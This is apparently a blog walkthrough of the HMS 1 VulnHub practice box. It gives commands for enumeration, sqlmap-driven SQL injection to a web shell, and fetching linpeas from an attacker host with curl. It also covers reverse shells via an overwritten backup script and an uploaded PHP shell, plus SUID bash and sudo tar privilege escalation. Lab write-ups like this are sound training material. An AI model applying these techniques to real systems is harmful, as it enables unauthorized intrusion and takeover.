Exploiting vulnerable machines in a legal and safe environment is the only way to become an experienced ethical hacker. That is what this site is dedicated to, and so I present to you the HMS 1 vulnhub walkthrough, another of the vulnhub series here on the site. HMS 1 is a vulnerable Linux box created by Nivek. The HMS 1 vulnhub box is an excellent practice for Linux privilege escalation and a delightfully refreshing exercise in learning web app hacking.
Here is an overview in what you can expect to learn from completing the HMS 1 vulnhub walkthrough:
- Manual SQL Injection and Exploitation
- Using SQLMap for SQL Injection and Getting a Reverse Shell
- Linux Privilege Escalation
Table of Contents
Here’s What You Need
Inital Enumeration
A nmap scan reveals there are some ports open, mainly web and FTP. The web app is running on a non-standard high port 7080.
nmap -sT -sC -p- 192.168.1.145Web App Enumeration
One of the first steps to complete for this challenge is to do web enumeration, there could some interesting directories in this web app. The wfuzz tool is great for completing this task.
wfuzz --sc 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.1.145:7080/FUZZ.phpOne of those interesting directories on the web app is the login page, found at /login.php which looks like HMS now stands for “Hospital Management System”. We can look up published exploits for this web app, but it turns out this is a custom-made app. Looking at another page, header.php reveals that there is a website for this app’s developer.
We can find the credentials for our first web app user by downloading the source code for the app.
At this point in the challenge we have our first set of credentials, so let’s login to the web app and see what is behind this login.
Get Your First Shell
There are multiple ways of getting your first shell by exploiting the SQL injection vulnerability in the app. I am going to highlight two methods here: using SQLMap and using manual injection followed by uploading a reverse webshell.
- Login to the admin portal and save the request from Burp Suite into a file named request.
- Feed SQLMap the request file and add on the –os-shell flag.
SQLMap has a flag that will attempt to open a web shell on the target by exploiting the SQL injection vulnerability.
sqlmap -r request --os-shellThis web shell is quite difficult to work with, however, so we will pivot to leveraging the actual web shell that SQLMap uploaded in the first place by using the cmd parameter that allows remote code execution.
After looking around the directory using the os-shell prompt we have, I have located the actual web shell file that SQLMap uploaded, tmpbtvz.php.
So how do we go from executing the whoami command on the target to getting a reverse shell to our Kali Linux machine? Use the PayloadAllTheThings netcat OpenBSD reverse shell oneliner, but also URL-encode the full command, everything after cmd. The payload will not work if you don’t encode it!
Linux Privilege Escalation: Daemon to Eren
Unfortunately the user we are now connecting as is daemon which appears to be severly limited in abilities. But after uploading the linpeas script to the target and reading through its output there is a file owned by eren which has the SUID bit set. It turns out there is a way to abuse the SUID binary /usr/bin/bash. GTFOBins documents this security abuse.
# KALI LINUX
# get linpeas
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
# start web server from directory with linpeas.sh
sudo python3 -m http.server 80
# TARGET
# run linpeas (1/4)
daemon@nevik: $ cd /tmp
run linpeas (2/4)
daemon@nevik: $ curl http://KALILINUX:80/linpeas.sh -O linpeas.sh
# run linpeas (3/4)
daemon@nevik: $ chmod +x linpeas.sh
# run linpeas (4/4)
daemon@nevik: $ ./linpeas.sh
# find SUID binaries (2/2)
daemon@nevik: $ find / -perm -u=s -type f 2>/dev/null
# run bash with privilege flag
daemon@nevik: $ /usr/bin/bash -pThe enumeration script has also found an interesting file /home/eren/backup.sh. The script is performing some kind of backup function for the web files, but not for long as we will weaponize it! In order to get a proper shell as eren we will need to write over the existing backup.sh script with a reverse shell oneliner that will send a new shell to our Kali Linux netcat listener.
Notice how the EUID, the effective user id is now for eren.
Linux Privilege Escalation: Eren to Root
Now that we have a proper shell as eren and not just the eren EUID, we can finally check the sudo commands privileges this user has. So it appears that eren can run the tar command with sudo privileges. Looking at GTFOBins (save this link) there is an easy way to abuse tar to achieve privilege escalation.
By running the command above, we now have root access to the box and it’s a jolly maneuver to the root user’s home directory to find and print the root flag.
Exploit Without Using SQLMap
If you are training for the OSCP certification you may know that automatic exploitation tools such as SQLMap may not be allowed on the exam. With that in mind, I will highlight the other exploit method which is a manual approach.
Navigate back to the login page and open developer tools to view the source code. Simply edit out the “type=email” field and then hit enter.
By logging into the dashboard now you can see that the source code for the page reveals another page named setting. This page has an image upload feature which we will use to upload a web shell. Copy the file /usr/share/webshell/php/php-reverse-shell.php and edit the settings to reflect your Kali Linux machine’s settings. Now upload it and view the shell in the /uploadImage/Logo/myshell.php to receive a new shell back!
